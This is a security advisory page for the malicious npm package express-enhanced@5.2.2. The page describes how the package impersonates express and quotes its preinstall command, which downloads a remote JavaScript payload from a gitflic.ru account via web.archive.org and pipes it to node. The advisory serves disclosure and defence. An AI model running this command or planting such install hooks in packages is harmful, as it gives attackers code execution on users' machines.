Logo
npm

express-enhanced@5.2.2

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC

Malicious

OSV ID

MAL-2026-17489

Ecosystem

npm

Summary

express-enhanced@5.2.2 impersonates the express package: it ships the express README verbatim, declares TJ Holowaychuk as author, and points repository at expressjs/express, while publishing under a different name. The package.json preinstall script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, downloading an unpinned JavaScript payload from a gitflic.ru account unrelated to the express maintainers (wrapped through web.archive.org) and piping it directly to node at npm install time. The fetched content is not integrity-checked, the source is mutable and attacker-controlled, and execution happens automatically on install, giving the publisher arbitrary code execution on any machine that installs the package.

Source: amazon-inspector (15d6ce3e4c988439e6023bb900fde41c1a7eebe0c372eddc3a3c3c9d8206a9d6)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.